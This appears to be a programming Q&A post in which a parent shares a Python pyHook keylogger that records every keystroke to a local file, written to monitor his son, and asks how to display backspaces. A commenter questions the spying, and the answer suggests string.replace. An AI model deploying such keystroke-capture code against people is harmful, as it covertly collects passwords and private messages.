# replacing the backspace ascii in python

Tags: python, winapi, ascii, pyhook

i'm using pyHook to capture key events to monitor my sons web activity and i have noticed that when i use the backspace key, it writes to a file as ascii, which appears as a little black box in notepad.

is there any way possible i can replace this black box with `[BACKSPACE]` or just backspace the characters inside the file in general, to read it easier?

Here is my code so far!

```
import win32api
import sys
import pythoncom
import pyHook
import os
from time import strftime
buffer = ''
if os.path.isfile('c:\\output.txt'):
    f = open('c:\\output.txt','a')
    f.write(strftime("\n\n%A, %d. %B %Y %I:%M%p\n\n"))
    f.close()
else:
    f = open('c:\\output.txt','w')
    f.write(strftime("%A, %d. %B %Y %I:%M%p\n\n"))
    f.close()

def OnKeyboardEvent(event):
    if event.Ascii == 5:
        sys.exit()
    elif event.Ascii != 0 or 8:
        keylogs = chr(event.Ascii)
    elif event.Ascii == 13:
        keylogs = keylogs + '\n'
    else:
        pass
    f = open('c:\\output.txt','a')
    f.write(keylogs)
    f.close()

while True:
    hm = pyHook.HookManager()
    hm.KeyDown = OnKeyboardEvent
    hm.HookKeyboard()
    pythoncom.PumpMessages()
```

Comment: Maybe just a informative calm adult talk with your son about the dangers, and joys of the world would be a more productive solution than spying on family.

Answer (score 0, accepted):

How about plain [`string.replace`](http://docs.python.org/2/library/string.html#string.replace)?

```
string.replace(your_string, '\b', ' ')
```

Replaces all backspaces in `your_string` with spaces.